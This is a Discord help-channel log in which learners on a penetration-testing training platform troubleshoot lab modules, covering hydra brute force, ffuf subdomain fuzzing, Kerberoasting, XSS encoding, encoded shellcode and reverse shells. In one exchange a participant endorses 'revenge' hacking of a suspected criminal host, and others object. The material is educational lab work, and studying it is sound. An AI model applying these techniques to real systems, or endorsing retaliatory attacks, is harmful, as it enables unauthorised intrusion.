#modules

that's because ippsec's playbook hasn't been updated in a while

you're better off installing what you need as you go through Academy

some tools may also be deprecated at this point, for example CrackMapExec, which was succeeded by NetExec

yeah I heard about CME being deprecated

is it worth still using the htb version or does it not make much difference?

the only difference i've seen is some very minor visual changes

the tools are what you find in Security edition

it's not like the Pwnbox on HTB

I have been running kali for as long as I can remember I only moved to parrot for ease of assistance in here

I use -fs a lot. If you don’t want to send your command in public, feel free to dm me and blur out part you don’t want to share

sweet thanks

Thanks alot, it worked now, I think sublime meesed the characters, so when i copy paste, the syntax is not great.... that's my only explanation why it wasnt working proprely

Ah that happens sometime

it's only when i copied the same command from a mate on discord, that it worked...... one can go crazy

Glad you figured it out 👍

Thank YOu !

past 2 problems on bash seem imposible

i know my code is right, even copied it from the guide through

Cant establish a reverse shell on host-01 on Shells & Payloads assessment
Crafted a war shell with msfvenom and uploaded it on tomcat interface - no sure about LHOST - has it to be ens192? - any hints

but it just wont budge (the following picture is the problem, although others have also been not possible)

for reference, my code is the following

module and section?

Bash one I think.

yeah I just want people to incude it as a habit so I don't have to keep asking

lhost should be the ip of the internal interface

bash scripting

and its comparison operator

code seems fine, right?

iirc in the SSTI section in module 145 there used to be a part guiding you to achieving RCE with string and it is gone. Did the section get removed or relocated elsewhere?

its the correct one

i even had the step by step thing, the same code

the newlines count as characters

but i removed them

before base64

removed them from everywhere

still nothin

what do i do 😭

then you should look at the exercise script again

i did

i even copied the step by step one, i have it right

but u did echo -n and the exercie script is var=$(echo $var | base64)

if you say so

alr tried with out it

i alr tried without it and it still didnt work,

im so puzzled

it is puzzling and the whole thing is quite abstract as all is b64 encoded. Maybe just try again from what's given in the exercise, then you can modify and try to get the same result another way.

i even tried to make it "just be on the string, no limit of how big it is" and still nothing

its so wierd

did you read the hint?

yep

i tried that 2, i tried that way

i even tried "echo "ANYTHING", it just dosent

whats the procedure here

when you do echo -n, your first $var may not be correct to find the $value inside it

i removed the -n

still nothin

i feel like the htb excersise is wrong

like, its outdated or smthing idk

so now you have to review your if-then statement

dude

its correct, i know its correct

even tried this, doesnt output anything

if it's correct then how are you not getting anything

so it's incorrect

i even copied the answer

the actuall answer, and nothing

wdym you copied the answer

from the guidethrou

the detailed explination

i feel like even if i did the decoding by hand, i wouldnt find the substring

well, in the provided script is there echo -n?

no

but again, i tried without it

see?

ik what i can do

that does output things

ima cat the var into a file, and ctrl-f

no

I just ran it

this does not output anything to me

oh so its my mac 😭

is it actually my hardware?

Mac terminal isn't bash afaik

why are you running it on mac tho, there's a pwnbox for you to use

ima run it online

dude it works

for once in my life my code was actually right

thank you 2

ow, when they say "i got nothing".. it was literally nothing.. I didnt think about that

so that's why ISP support always ask: is your router on?

Turning it off and on again is actually a legit troubleshooting step

yeah but i guess they start with the most basic thing

are you on a bash shell?

Apparently Terminal does run bash fwiw. But it's also Mac

So...

mac defaults to zsh now but with the shebang it should be bash

idk what's the problem

just mac things ig

Sup guys

whats up..

Just got banned from a server for hacking 😔

Now I have nothing to do

I hacked all my friends already

sure thing bud

Hi 👋

Hey

Hack me then

😂

That bio 🥲

i don't even want to think about whether it's bait or not

ah lol, the experience dropped from 10 to 7 years. Probably too obvious to have experience >= age

#rules also this isn't a gen chat, read and follow #welcome, I also suggest not admitting to illegal things

Hell nah this is what I was banned for

Ok sorry bro

No bro wdym

I had a typo

Anyway not a gen chat, I suggest reading and following #welcome to access more channels and be able to type in #general

Okay I am 20 bro

But hacking others isn't what we do here

https://tenor.com/view/i-dont-care-dont-even-care-gif-18539683

Ik

Ik

K so I suggest following rules

Okay

And taking conversation to the relevant place, not a channel that's for helping with htb academy

Okay

@hoary vine Sir Be a good guy or on the way with !

Bro I am 20

Okay 👍

Let's not continue this @naive sage

Is he a mod

No

Okay

But again, let's not continue this conversation

And stop flooding this channel with useless chatter

There's an appropriate channel for just chatting

How many people are here

Okay 👍

If you can't read and follow #welcome then that's a you problem

Sure.

Guys did anyone hear about tracker.qu.ax?

As far i can tell it's trying to infect my PC and i'm planning to revenge the cybercriminals

It's trying to connect the worm

On port 6969

Very adultlike btw

And i did a nmap scan and it's leading me to all sorts of hosts including a bitcoin adress

What are the ethical boundries?
Can i just attack a black hat org?

I don't see why not

Hi, I'm having difficulty finding the right answer to the question of total number of installed packages in target system (Mod: Linux Fundamentals; Section: File Descriptors and Redirections).

I have tried to use the knowledge provided in the section and have researched other ways of find the required information, but I just keep coming up with all but the right integer. I would appreciate some guidance.

What have I done?
Listed all installed packages using APT commands and piping result to wc -l;
used find to list all files and filter through wc -l (here, it is not possible for me to know how to filter file-types, so the total for number of installed packages will be incorrect).

look at the start of the apt command without wc -l , there are extra lines you need to account for

Not the channel for this

Read and follow #welcome to access more channels

@next bronze I shall do as you suggest, but how do I count what may be 'extra lines' with wc?

Ive been a member since 2018 on the site i'm not new but i don't really interact with the mods/users

you just change the number once you get it

That's not my problem, this channel is for help with academy modules

Ok

It’s illegal

Cool. But the law will not do anything for the moment

This conversation isn't for this channel

If it helps stopping criminals?

Still illegal

Still illegal

I suggest stopping this convo

:)

If I murder a murderer I will still go to jail

Ohh

Very threatening

Two wrongs don’t make a right

Unless you're the executioner

That's not the same

Still the same thing really

Touché

Anyway; <@&861185840277487616> before this continues off rails

I'm stopping a malicious activity and the pc is used for evil and stopping it will not cause any disruptions

It was an analogy..

Well it's a bad one

Mate have at it

Like I said it’s illegal, idgaf

Have fun getting caught

Gee man are you always this cocky?

Are you always this stubborn?

No

Anyways

Just trying to keep this channel on-topic

You're right

I'll just get infected

And do nothing

Like cowards

Report the domains to the feds

But if you got infected 9/10 times you downloaded and ran something you shouldn't

Please keep the topic according to the channel description

@next bronze I'm saying 'sorry' to myself, but, I tried your suggestion, but it yielded nothing. I tried APT with and without options; I do not get the correct figure. I'm missing something outside of the package manager installations, but I don't know what.

sudo apt list --installed will do it, make sure you have ssh'd into the target

@next bronze I have used those commands several times; they provide the wrong answer. So, I'm missing something, but what?

well as I've said, look at the start of the apt command without wc -l , there are extra lines you need to account for

@next bronze I did as you suggested and could find no extra lines. sudo generates an incident report, as I am not in the sudoers file.

@naive field Were you talking about the last question in Windows event-logs and finding evil? last question of second section is saying to replicate the attack

You don't need sudo to list

@next bronze I'll just have to leave the question and unfortunately, fail the module. Such is life.

Hey gents any dark websites

uwot

yess mimikatz

Don't use sudo

but nnorhing pops up in sysmon

Just apt list --installed

Have you gone to the C:\Tools directory and ran mimikatz? @naive field

oh it won't let you sudo anyways

It doesn't require it anyway

Well i'm just watching the pirated Netflix because f$ck Netflix & all their other milking companies.

I lost all the respect because of their latest monstrosity with the Avatar the last airbender.

I give 0.000000000 cents for greedy cancer pigs

pirated

Yep that'll do it

iirc in the SSTI section in module 145 there used to be a part walking up the import chain and achieving RCE that is gone. Did the section get removed or relocated elsewhere?

Hi sirg he's been on this for a while

Yeah. Scrolling up and I can see that.

Wydm?

Hi there. I'm new to the community here. I have a question regarding the assembly module skills assessment task 1. Is there anything with the shellcode values I extracted? The syntax is in Python btw
shellcode = [
'4831c05048bbe671' ,
'167e66af44215348' ,
'bba723467c7ab51b' ,
'4c5348bbbf264d34' ,
'4bb677435348bb9a' ,
'10633620e7711253' ,
'48bbd244214d14d2' ,
'44214831c980c104' ,
'4889e748311f4883' ,
'c708e2f74831c0b0' ,
'4831c05048bbe671' ,
'014831ff40b70148' ,
'31f64889e64831d2' ,
'b21e0f054831c048' ,
'83c03c4831ff0f05'
]
I combined them and using ''.join() and all I get is a dollar sign and exit after entering anything. I also tried to order each extracted shellcode in little endian yet not working. I set a break after the xor and checked the value of rdx each time to get the shellcode. This is my assembly code:

global _start

section .text
_start:
mov rax, 0xa284ee5c7cde4bd7
push rax
mov rax, 0x935add110510849a
push rax
mov rax, 0x10b29a9dab697500
push rax
mov rax, 0x200ce3eb0d96459a
push rax
mov rax, 0xe64c30e305108462
push rax
mov rax, 0x69cd355c7c3e0c51
push rax
mov rax, 0x65659a2584a185d6
push rax
mov rax, 0x69ff00506c6c5000
push rax
mov rax, 0x3127e434aa505681
push rax
mov rax, 0x6af2a5571e69ff48
push rax
mov rax, 0x6d179aaff20709e6
push rax
mov rax, 0x9ae3f152315bf1c9
push rax
mov rax, 0x373ab4bb0900179a
push rax
mov rax, 0x69751244059aa2a3
push rax
mov rbx, 0x2144d2144d2144d2
mov rdx, rsp
mov rcx, 14

loopXOR:
xor [rdx], rbx
add rdx, 8
loop loopXOR

anything wrong*

https://tenor.com/view/wesker-albert-albert-wesker-resident-evil-resident-evil-4-gif-5143688443782660001

is there any staff here?

unfournatly the support chat is ofline

offline*

If you read and follow #welcome you can wrap command blocks in ```

And automod won't get mad at you

(It also makes it easier to parse)

Why do you need staff?

i wanna report a broken module

but on the site its offline

and i want to move forward

#1234357888114364508 then

It's the weekend so less are online but you can send a message anyway.

I sent a one hopefully getting a reply. Thanks anyways

@fathom pendant In future, I won't.

I mean it just depends lol

Some commands do and some don't need sudo

@fathom pendant As a 'free' subscriber, I have very few privileges; sudo being one, and getting help (not that you and the forum community are not helpful - you all are).

It's nothing to do with your subscription level

It's just the way the lab is designed

@fathom pendant I get it. (Not remaining too long off-topic) I would get the hints and tips that you can only vaguely suggest, were I a paid subscriber.

Nope

Your hints and tips have nothing to do with subscription level lol

@fathom pendant If so, why am I not able to switch on the in-section help?

That's a walkthrough, for annual subscribers. But it's not required

@fathom pendant It's useful for beginners.

Not really

The walkthroughs/guides don't really explain much

So you're not learning anything except copy/paste

As the walkthrough is assuming you read the content/did some research

This module's sublesson is all about research. Linux is well documented, you can generally ask Google a question of "how to <do thing> in Linux" and you'll get a lot of results

@fathom pendant Indeed. The expectation is to have done some work before reaching out for the available help, otherwise, as you say, you're not learning anything.

There's only one question in the module that's a curveball, as it requires a bit of html knowledge, alongside regex

But there's a forum answer that details the steps

@fathom pendant I think you underestimate the amount of learning, researching to be done and the number of curveballs thrown.

Nah, most of everything else in the module is usually a <command> --help or man <command> away

The question I'm referring to requires a bit more knowledge

It involves curl

@fathom pendant You're very experienced; I'll have to take your word on it and apply myself a little more to the tasks. Good chatting with you.

Almost everything else is about as straight as it can be given to you

I only just started a couple years ago.

The modules also tend to make you use your brain to apply what you just learned to the situation

@fathom pendant You have a wealth of knowledge and experience; I started a few days ago.

Not everything is as simple as copy/paste from examples

@fathom pendant Very much like coding then: the skill is in problem solving.

Anyone who can help me with a problem?

Which module is it about?

Attackin Common services - easy

It's not something about knowledge, or how to solve. I am sure that I found the correct solve, but pwnbox is not working, neither do my kali...

Basically, I get an error when running hydra, changed the command multiple times, still not working.

Let him help me first man xD

i am waiting here 2 hours ago but fine

show me your hydra syntax

You're not the most important person in the room

Hmm? Only with the information “it doesn't work” it is damn difficult to help

What's your command and error?

I didn't say that. And 1st of all it was a joke, take it accordingly 🙂

Didn't read as a joke

That what's that "xD" at the end means

Sorry, I haven't worked through the NTLM Relay module yet

Again, still doesn't make it read as a joke

But that's detracting from the point

Command/error

We need those to effectively help you

Anyways, i used smtp-user-enum, i found a user. Now i am trying to run the command "hydra -l <user> -P /usr/share/wordlists/rockyou.txt ftp://<TARGET-IP>" I also tried "hydra -l <user> -P /usr/share/wordlists/rockyou.txt -f <TARGET-IP> ftp/smtp

And the error i am getting from hydra is "[ERROR] 1 target was disabled because of too many errors
[ERROR] 1 targets did not complete"

Try less threads

I let it with default. I tried multiple walkthroughs for this exact challenge, and none of them worked. I tried one posted yesterday...

try less threads

Leaving @ default isn't trying less threads

Do you really have the correct user name?

Yes, 100% sure

And you dropped the @domain from the user retrieved?

For FTP, no, for SMTP, yes

For ftp, drop it

Smtp also doesn't have much auth usually, you'd want to sign in to imap(s)/pop3(s)

For FTP i use only the user, for SMTP i try user@domain 🙂

Either way

I treid that also, but i get errors

Try ftp with less threads

As in less than default

Keep going lower

Like 1-2 threads

Seriously?...

Yes

As I've repeated. Multiple times

Wow, next time, if you want to help someone, try to be a little bit less aggressive. Thank you, I will figured it somehow. Have a great night!

...dude I repeated it like 3 times

The error is the ftp service shutting down due to too many connections

If you want the reason why it's failing

@fading oracle If something is not working properly, try the PwnBox. Or change the VPN server and then try again. This way you can rule out the possibility that something is not working properly with the combination of server and attack box.

Did all that

and i already verified with @next bronze that the commands i use are the ones

i have no clue

and tbh i am fed up that this happens every week

it just takes away the fun from the learning

i changed vpn 3times

used the pwnbox too and restarted the server 12 times

Anyone that can help with Server Log Poisoning in the 'File Inclusion' module?

Whenever I am adding my php shell code into the server log via my user agent it seems to be bricking it for some reason.

I can add something like "test123" as my agent and still read it fine but as soon as the php shell is put it I cant get it to come back or get any output.

Tried using browser/burp/curl... I'm probably missing something dumb but no idea at the moment.

Has he solved the module? Maybe he can try it from his side.

he solved it yes

Note the quotation marks and think about which quotation marks have what effect in the log file

Got it working now, Thanks for that. Need to keep that in mind for any future payloads!

Howdy, I could use some help please.
I'm trying to finish up AD Enumeration & Attacks - Skills Assessment Part II

||I have c*, am logged into ms01 as that user. Whenever I try to run any commands against the domain they fail, I have tried using powerview, it fails, tried changing password with net user, it fails, tried adding users to the domain admins group, fails. winrm & rdp fail for dc01 with that user.|| I'm not sure what to shoot for now.

Spoiler on user you can just abbreviate it to c*

I edited it. I had it in spoiler tags, so I thought that was fine.

Spoiler tags don't really do much

As anyone can click them anyway (or even turn them off in settings)

is anyone else having trouble spawning targets? Active directory and enumeration attacks - dcsync. Its been trying to spawn for over 30 minutes. I have tried logging out and back in, didnt help...

Try a different VPN?

Trying now to see if it works, will let you know.. thx

Doesnt seem to be working....

Have you tried restarting the lab?

Yeah... I can try again though...

Feel free to PM if you are still having issues

Thanks

Module Shells and Payloads, Infiltrating Unix/Linux - Question: Exploit the target and find the hostname ....

The step by step solutions doesn't include the solution for this question.

are you looking for someone to give you the answer or are you stuck on something and have a question?

@next bronze Just an update. I followed another path to listing installed packages and to my surprise, the amount had changed! Now I have to wait until later this morning to find out if it is the correct answer.

Regardless, thanks for your help.

hmmm? the command I gave you earlier definitely works, you'll just need to -1 from the result

i'm taking the InfoSec Foundations path and i'm in the Setting Up module. Are we supposed to be creating our file tree in bash, downloading all these apps, and preparing everything mentioned here now?

i'm asking becasue it's not explicitly telling us to...it's just mentioning these tools

no, they're just suggestions on what you can use in the process

ah ok, so they will be clear when something is required?

but I'd highly recommend start taking notes right now, it's the most important thing you can do

thank you!

you can do things your own way if you wish, those are just suggestions

makes sense

appreciate your help

hi everyone, i have a question about "AD Enumeration & Attacks - DCSync" module.

Where is the password provided for the RDP connection to ACADEMY-EA-ATTACK01?
I have already been given that password but was not sure where it is provided.

Maybe you shouldn't be copy pasting your way through then

hello what am I doing wrong?

Hi, can i please DM you?

Yeah sure

Is there a way to make responder work over a pivot? Say I can reach MS01 directly but not DC01. After setting up a ligolo agent on MS01 to get access to the internal network, is it possible set up listeners to capture any NTLMv2 hashes from a DC01 user using responder on my attack machine?

im sure indeed.com has a great resolution 👍

?????? what does it got to do with indeed

you'd need to stop the smb service and forward 139 and 445 for it to work on windows

if you want to capture ntlm

<@&861185840277487616>

Thanks. I figured that'll be the case if MS01 has a smb service running.

Whatcha got there @next bronze

Inveigh would be easier

move on

Istg if you don't finish the reference I'll be sad

I got

oh yes a smoothie of course

it's above the questions

Yeah, that's my usual way to do it. But what about in a situation where I need to to a ntlm relay attack? I won't be able to just run ntlmrelayx on my attack macine

There's a whole setup section that gives it

for relay attacks you can generally control where the auth is sent to, so just send it to a linux host

Does HTB Academy not have a Singapore VPN?

nope

only US and EU; they do have SG Pwnbox Locations though

likely something to do with the hosts/providers for them and costs

¯_(ツ)_/¯

I see.
I'm extremely frustrated today because RDP and SSH access is so slow.

try changing the vpn region and seeing if that fixes, is it a consistent slow or like randomly slow

hey, im at Information Gathering - Web Edition Skills Assessment, and im stuck
i cant find any subdomain

if it's consistent, that might just be latency; though i've heard some people have had minor success using a vpn to access a region, then using the openvpn config through that

add -ac

wait that's gobuster

why is gobuster showing 400s?

lol

gobuster should be discarding those responses

idk

for what tool ?

i tried ffuf but it returns all of them as valid subdomains

ffuf add -ac

also with gobuster ig you can add -b "400" for it to blacklist the 400 errors

weird that it's not there default

the other thing with ffuf is you can also filter by response size (-fs) for the most common size you see

hmm

not too familiar with gobuster tbqh

yeah im doing it now

also dnsenum won't work as it requires DNS to be running for it to work

yes sir

and the scope of this host is ONLY the port given

I'm in Australia, so I'd like something in the region too. but it's fine for pwnbox and there are some Aus servers when doing boxes.

@rose compass @sterile solstice there is the /feedback command that sends a message directly to the HTB slack for more staff to see :) (note you won't receive much in terms of feedback on your feedback)

btw this is my ffuf command , am i doing it right?

ffuf -w /usr/share/wordlists/amass/subdomains-top1mil-110000.txt -H "Host: FUZZ.inlanefreight.htb" -u http://inlanefreight.htb:30951 -fc 405 -fs 120

don't need -fc

but it will work though

but at the same time you can also instead just do -ac

-ac autocalibrates ffuf

oooooh

thats nice

so it will automatically adjust its filters

good idea. they wont know if ppl dont ask right, lol.

oh we've been asking

well it's not just that, as much as I love g0b and some of the staff that have caught and seen people mentioned it, it's easy for it to get forgotten about

hahaha. noted 😉

but yes do ask them more

doing it now

as most of their acad customers are in US/EU, however since it's been gaining more traction -- it never hurts to nudge them on it

also as a fwiw; the reason the pwnbox has AUS/SG servers, is because acad and lab pwnbox are both hosted via the same provider

so they already have those servers ready (on the backend) as opposed to the vpn hosting provider and such

i do love the platform, and i do hope it'll gain more traction. i know plenty who do cybersec but stick more to the typical OffSec type stuff ...

found the subdomain thanks @fathom pendant

as a forewarning; whenever you can't find something, dig another layer deeper

:) and ofc don't forget everything that was taught in the module, most come into play in some form or another

I live in Japan, and Pwnbox works without any problems. However, some modules's RDP are unstable (xfreerdp, rdesktop).

@old haven we don't do voice notes here

please type out whatever you're having issues with in academy

I have a script to help you find the best server if that helps
https://gist.github.com/Xre0uS/2105986d23719cf99c271842528f48a6

necessity breeds invention :)

yeap

as a side note i've been too lazy to switch back to US

thats my experience too. a VPN for Japan would be fine. It's closer than europe haha. Or if they insist on staying in the US, how about Guam? lol

nice...!

I believe US-3 or 4 might be located in a server farm on West Coast fwiw

might be geographically closer

but i'm not geographist

i'm pretty sure they're similar distance tbh.

i submitted feedback. will see what happens :). won't hold my breath

nice script btw. after doing the python for dns module, i decided to do my own (first) python project to improve the skills. going to do an enum script to mke things easier for when i do a real pentest ...

that module wasn't too bad

thanks

wait why is eu latency suddenly ~100ms lower

After crawling the inlanefreight.htb domain on the target system, what is the email address you have found? Respond with the full email, e.g., mail@inlanefreight.htb.

i used the tool in the module ReconSpider but the results are empty

do you write other scripts to help with your work? maybe HTB should have a module on what type of tasks are good for automating as a pentester lol.

which module?

I do if existing tools aren't sufficient, but generally python skills will translate well to whatever you need it for

yea ive used it more with finance type stuff. so im used to seeing pandas and dataframes. even with the project i want to do, i have the temptation to package results into a df and then write to a csv as thats whatyou do with finance data .... lol

nvm

ive never followed through with a proper project which is why i thought small tools would be good to work on, to improve. even some of the POCs i've seen have been basic, and some also just dont work (older versions of python usually)

What is "!rank"?

yeah it can vary a lot, usually there are existing libraries you can work from in the scripts too

I mean the best way to start is just when you see something that can be automated/improved on, write a script for it

yea, like dnspython. which is a large and well constructed library.

i also did the bash scripting module recently too. that was maddening tbh. i found it super sensitive and no easy way to debug.

write it in an IDE with linting

vscode would be the easiest but I use nvim

do have any tips where to learn programming? I'm halfway CS50 intro computer science and thinking to codecademy after, is codecademy any good?

i used vscodium in my VM, but i still had issues.

i rencently installed pycharm (i've had it before but didnt have it in this VM). and since im still a student, i got free professional license. so now ill be using that.

installed the C and Java IDEs that come with it as well, incase i need it in the future

best way to learn is to make your own project, I didn't take online courses for programming, most of my knowledge comes from projects I did in school and my own personal projects

okay yeah CS50 is all about that but its overwhelming.

oh, i have CS50 on my list! heard its great. but as Xre0uS says, do a project of some kind. which i know can be hard, but even doing a little bit for my own i feel like ive improved heaps.

never used pycharm but the jetbrains ide are pretty good I heard

yea im not surprised. its rated highly. i heard that even seasoned programmers get stuff out of that course, despite being beginner friendly

ive used anaconda for my windows machine. but i think ill just switch to pycharm, im liking it.

@soft reef if you like to tinker, you could get a raspberry pi or ardunio and make a project in micropython. if you want something cybersec related, you could build some badUSBs for future pentests.

I did one of those, very fun, would recommend

if you're lucky enough to have your own place, you could also go the homelab route (i dont own but i do have a homelab, its just downsized). i havent done it yet, but automating things at home or even standing up services can also help.

i got sidetracked when i saw a youtube video on HTB and said "hey ill do CPTS", otherwise i shouldve been fixing my homelab. haaha

Okay well I'd be happy if I manage to write some simple brute force or fuzzing scripts.

yea! thats something ive also wondered about doing too. there'd be a million of them out there on github, but building something your own is good. try the 'python for dns' module. i got a few ideas from that.

yea i saw someone show off a few of them and i mentally added it to my list of future projects hahaha.

as i hinted earlier

go a little deeper

I got an issue with sqlmap module, section attack tuning, first question. sqlmap can dumps the contents of everything but the content of table flag5.....I tried to use the switches in the hints section too, no luck, all the other tables are dumped

why would a file on an SMB share not be "get'able" when we have read permissions to the file and the share?

surely read is all the permissions you need to download files from smb shares

I read slowly first section on the Windows Event Logs and Finding Evil.
Try understand it hard as much as I can

But I can't understand it. Can someone give me some tips?

it should if the individual files are accessible

is it time based?

hello
is there any tool to make a list of directories by scraping the website

i remember reading about it in the academy but not really sure where

boolean-based blind

Information Gathering - Web Edition probably

shouldn't be caused by bad connection then, try again or reset the target

yeah but couldn't find it
it takes keywords from the target and forge list of possible directories

i mean, CUPP does that for passwords .... but not sure about directories

I know what you're talking about

Starts with a c..

no not cupp

crunch?

Yeah possibly

feels like a typo in the academy : https://gyazo.com/0a4648527538a8975c532d06f5717dd1

No, maybe not

they want web diectories tho, not wordlists

I mean the Creepy Crawlies section has a few

@zenith vale report in #1234357888114364508 if you believe there is an error 🙂

CeWL

my bad

That's the one

CeWL that's it

yeah

l337_h4x0rs_R_cewl

anyway i just finished the Dom Based XSS section

feels like an erratum is needed on it

No worries, thank you for noticing and reporting

you can get the Reflected XSS flag alongside the intended DOM one

unless it's intentional and I'm dumb?

Must be

(sorry)

¯_(ツ)_/¯

Oh yeah it is CeWL

que sera, sera

thanks, same command worked after spawning a new target ,weird

im not sure why i cant post it in erratum

but yeah i need this
i thought there is something already made so i don't reinvent the wheel

nvn im an idiot 😂

must have been the wind bc now i can't get it LOL

the sqlmap module is just funky overall tbh

@ocean night coming in with the hotfix

¯_(ツ)_/¯

probably my cache being weird

I'll take the credit

Sure

(did nothing)

HTML encoding to user-controlled output

The application should encode user-controlled input in the following cases:

Prior to embedding user-controlled input within browser targeted output.
Prior to documenting user-controlled input into log files (to prevent malicious scripts from affecting administrative users who view the logs through a web interface)

can someone please explain this to me

basically: always sanitize user input

i get the second part, which is regarding server log poisoning

before input is embedded via the text input, and prior to logging

buit the " Prior to embedding user-controlled input within browser targeted output"

yes

as in before it gets sent back

the mixage of the statements here is a bit confusing to me

before it's shown back to you

prior to showing the output

ok so im user, and i input data of a sort, the data needs to be encoded before it is reflected back to me

embedding is just saying "putting it on the page"

yes

it'll html encode special characters such that what's sent back is the literal string <script>alert(window.origin)</script> instead of executing it

ahhhhhhh

so instead of embedding it in the html it will input it as plaintext to prevent it from executing

when you view page source you'll see those characters would be the <script>...

so make it plain text rather then an executable script

basically, yes

great , thank you

<script>alert(window.origin)</script> <-- this is what html encoding would do

https://emn178.github.io/online-tools/html_encode.html

so i guess the typo should be regarded as HTML encoding to user controlled input rather then output i guess

no?

i mean the web app do need to encode the user input before it is being reflected

it's telling you when you would use HTML encoding in this subsection

but yeah not a typo

just a misunderstanding

is anyone got to the skills assessment in api attacks?

just ask your question

it should be straight forward

g0blin faster then flasg.

keeps saying that the request is malicious either big size, whereas its none of it

nvm will figure it out

section?

regarding that, wouldnt url double encoding may bypass the html encoding?

who knows

@rustic sage we don't botnet around here

so its a possibility 😉

idk i'm not an expert in it ¯_(ツ)_/¯

I'm not really interested in it

we still don't spread botnet info around here

read #rules

the stack is first in last out, so the order is reversed, check for each push and get each 8 bytes and work from there

Windows machines suck - very poor connections - cant establish shell with eternalblue - any hints beside changing vpn

there's no hints for that, find a server that works for you

in general are udp or tcp connections prefearable?

make sure you're using the right exploit

one is just a flood attack

Hi, I cannot ssh to htb-student, it says connection timed out

can someone help me

Are you connected via VPN?

it also helps if you provide the module and section name

im not connected via vpn and im on the linux fundamentals: "working with files and directories"

Someone can help me for DOCUMENTATION & REPORTING Q1?

but also this problem has been happening since even the first module. I just straight up cannot connect using ssh

are you using your own vm?

yes, Im on parrot OS

well then you'll need to connect to the academy vpn

https://help.hackthebox.com/en/articles/9297532-connecting-to-academy-vpn

oh ill try this right now

do I have to install openvpn to connect

it's installed by default in parrot

it says "options error: In [CMD-LINE]: 1 : Error opening configuration file: academy-regular.ovpn"

did you download the file?

yes, its saved in documents

is your current directory in documents?

Hey, In Introduction to Windows Command Line Module's Managing Service Section. As mentioned in the section to|| stop windows defender service we need to be on Local System account ||So i gained a reverse shell from the windows target to get the Local System level permission shell on my Attacking Host. But if i tried to stop the service using sc stop windefend even though Iam having the System account still it denies me, why's that?

oh i see, my directory was not set to documents

I don't think you can stop it like that, it's probably defender's self protection

oh sad, i thought i could stop it like mentioned in the module's section with Local System account if i gained that(local system account) level permission.

Hi ! I have been stuck on : INTRODUCTION TO WINDOWS COMMAND LINE : on the question : For this level, you must successfully authenticate to the Domain Controller host at 172.16.5.155 via SSH after first authenticating to the target host. This host seems to have several PowerShell modules loaded, and this user's flag is hidden in one of them. I Can't Find a way to find the DC host Password. Thanks in advance ❤️

what section is this, in that module?

Skill assessment

im stuck on this running program

oh, I am not in those section yet.

the password is the previous questions answer

need help with http attackx TE.CL desync attack

I tried that , it didn't work

idk whats happening i think i payload is correct but not getting the correct response

Its the password to the user7 but not the DC

you can just ssh to dc with the same account

what's the problem

but with Local System Account level privilege I can stop that right like mentioned in the section?

I thaught I had to connect with ACADEMY-ICL-DC , thx you

connecting to this vpn is timing out. Its stuck on the lines that say "Timers: ping 10, ping0restart 120" & "Protocol options: explicit-exit-notify 1"

no it's meant to be running, open another terminal to do your things

oh wow it worked

okay thank you so much

it's blocked by defender itself

so no

Sorry for asking so many times. I spent a lot of time trying to get a system-level account's reverse shell from my target since I had no prior experience with getting a shell. I was so excited that I was able to implement that step. That's why I asked this time. Thanks for your response.

BRUH wth, i was trying with my burpsuite for 2 days but now i tried with pwnbox and got in single attempt

there are other ways to stop defender, just not with sc

also futher modules will teach you how to get system shells and whatnot, but good job researching that yourself

For the File Transfers section, I have very high latency. Do you know how I can fix it?

Use a different server

thxs

hello on the module 176 section 1778 I'm trying to find the password of the svc-iam user but when I put it in the answer box it tells me it's incorret even tho it's the only password I get from hashcat, anybody can help me?

module name and section name; the numbers just make it take longer for people to figure it out

sure one second I'm sorry

I'm on WINDOWS ATTACKS & DEFENSE/Kerberoasting

basically I'm stuck on "Connect to the target and perform a Kerberoasting attack. What is the password for the svc-iam user?"

can i DM someone for the Bypassing Web Application Protections case#11?

well... did you connect to the target and attempt to kerberoast?

the section sounds like it should be telling you how to do so

yes I've also transferred the spn.txt file to my vm

and allegedly cracked the hashtags with hashcat

hashes*

not hashtags

but maybe I'm just looking in the wrong place

well if it's cracked then do --show

the password will appear after the given hash

I'm sorry it's the autocorret

I did it but the password seems not to be the one I was meant to find

well did it line up with the service-iam user?

maybe I'm just missing some steps

I thought so

So calling them hashtags now.

Did you attack the correct user?

also be sure there's no extra spaces/whitespace in your copy/paste

I think so yes but now I'll redo just to check if I did it all right

I'll check that too thanks

sorry for mispelling hashes with hashtags it won't happen again

have a nice day

lol
WINDOWS PRIVILEGE ESCALATION / Miscellaneous Techniques
i escalated privileges, copied the sam, security and system reg to my attack host, used secretsdump, cracked it with hascat, and in the end all they wanted was another easy command...alright....

Hi,

Module: ACTIVE DIRECTORY ENUMERATION & ATTACKS
Section: AD Enumeration & Attacks - Skills Assessment Part II

So far, I have managed to get R** access to Mxxx server. However, I am unable to import active directory in it. This means I cannot use PowerView functions. This is creating a lot of problem for me. I am not able to perform right/permission enumeration. Is it intended? Or am I missing something while importing Active Directory module?

i remember i had used pwoerview without problems

Does PowerView not have dependency of Active Directory module?

Module: DACL Attacks II
Section: Logon Scripts

Does someone have a tip for the second question of that module?
https://academy.hackthebox.com/module/255/section/2910

it has it's own function that query the domain, no need to import other modules, did you tried to do some query and you had problems?

#modules message

hey that's me

use Invoke-ScriptSentry

It is you

yeap did that, and found the script i need to modify

also updated the content of that bat file but cannot get the reverse

how are you updating it?

putting it again with the same name

and it gets replaced

just edit it then

i will try that, but at the end it will have the same content inside, both if it gets modify on the same file as also if it is gets updated with the same name. When i check the content then it is modified, so had no sense to me that i could not take the rev shell.

i will try to just modify it and let you know

Just redoing Password Attacks Skill Assessments because of lack of documentation - can i DM someone who has the solutions documented? - I just know it takes a long time to crack and i dont want i to do it again 😦

just editing worked

👀

Hey guys,

does anyone know a good resource that talks about upgrading web shells to reverse shells? I mean usually it´s not that complicated, but i would like to look at it a little bit more.

I mean replacing and editing can be pretty different

if you have a webshell you have command execution, so just use a one liner

This is a life saver! Thanks!

Thanks to you too😃

why in this case? the file is already in the logon script path, so it's content should be executed at logon. I the file has the same content but in one had it has been modified, in the other it has been replaced with same name, same position and content is in the same

different metadata for one, if it's replaced

None of the commands are working 😦

well look at the errors, you don't have the rights to load them

😭

you can use another host where you have admin on

Sure.

unless there's some specific edge you want to abuse, where you're using powerview from generally does not matter as long as the machine is in the domain

Need to enumerate a little more.

Before I can do what you are suggesting. Thanks though, appreciate it 🙂

Module: Advanced Deserialization Attacks
Section: Example 1: JSON

Trying to use System.Windows.Data from PresentationFramework as per instructed in the section but does not seem to be working for me

finally finished the penetration tester path

How do you feel after completing the path and how confident are you in pentesting early and now?

